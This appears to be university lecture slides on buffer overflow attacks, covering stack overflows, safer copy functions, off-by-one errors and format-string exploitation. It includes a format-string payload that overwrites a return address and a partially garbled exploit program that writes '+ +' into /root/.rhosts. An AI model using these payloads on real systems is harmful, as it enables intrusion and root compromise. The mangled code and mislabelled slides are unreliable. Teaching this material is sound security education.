Buffer Overflow

• Symantic Paper

CSE 891

Michigan State University Computer Science and Engineering

First Generation: Overflowing a Stack Buffer

First Generation: Overflowing a Stack Buffer

int i; void function(void) { char buffer[256]; // create a buffer for( i=0; I < 512; i++ ) // iterate 512 times buffer[i]= ’A’; // copy the letter A }

Michigan State University Computer Science and Engineering

Michigan State University Computer Science and Engineering

First Generation: Overflowing a Stack Buffer

First Generation: Overflowing a Stack Buffer Overflows occur in programs that do not verify the length of data being copied into a buffer. Usually, functions that do not limit the buffer. (e.g. strcpy). Many such functions have safer counterparts, such as “strncpy” which takes an additional count parameter specifying the number of bytes that should be copied.

Michigan State University Computer Science and Engineering

Michigan State University Computer Science and Engineering

1

BSD: safer “strlcpy” is available The strlcpy() and strlcat() functions provide a consistent, unambiguous API to help the programmer write more bullet-proof code. First and foremost, both strlcpy() and strlcat() guarantee to NUL-terminate the destination string for all strings where the given size is non-zero. Secondly, both functions take the full size of the destination string as a size parameter. In most cases this value is easily computed at compile time using the sizeof operator. Finally, neither strlcpy() nor strlcat() zero-fill their destination strings (other than the compulsatory NUL to terminate the string).

Programmers who attempt to use relatively safe functions such as strncpy do not necessarily make their programs much more secure from overflows. Errors in counting the size of the buffer can occur usually resulting in a single byte overflow known as an off-by-one.

Michigan State University Computer Science and Engineering

Michigan State University Computer Science and Engineering

Second Generation: Off-by-One Overflows “myprog.exe AAAA%x%x%n Examine the stack layout

The first format specifier, ‘%x’, is considered the Return Address (0x401064), the next format specifier, ‘%x’, is 0x12FE84. Finally, %n will attempt to write to the address specified by the next DWORD on the stack, which is 0x41414141 (AAAA). This allows an attacker to write to arbitrary memory addresses.

Michigan State University Computer Science and Engineering

%x%x%x%x%x%x%x%x%x%.622404x%.622400x%n\x7C\xFEx12

This will cause printf to write the value 0x12FE84 (622404+622400=0x12FE84) to 0x12FE7C if the exploit code is two bytes long. This overwrites a saved return address causing the execution path to proceed to 0x12FE84, which is where an attacker would place their exploit code.

Michigan State University Computer Science and Engineering

Exploit1.c 1 #include 2 #include 3 #include 4 #include 5 #define ERROR -1 6 #define VULPROG "./vulnerable1" 7 #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */ /* get value of sp off the stack (used to calculate argv[1] address) */ 8 u_long getesp() { 9 __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */ } 10 int main(int argc, char **argv) { 11 u_long addr; 12 register int i; 13 int mainbufsize; 14 char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; /* ------------------------------------------------------ */ 15 if (argc > (i * 8) & 255); 23 mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13; 24 mainbuf = (char *)malloc(mainbufsize); 25 memset(mainbuf, 0, sizeof(mainbuf)); 26 snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", buf, VULPROG, VULFILE); 27 printf("Overflowing tmpaddr to point to 0x%lx, check %s after.\n\n", addr, VULFILE); 28 system(mainbuf); 29 return 0; Michigan State University }

Computer Science and Engineering

6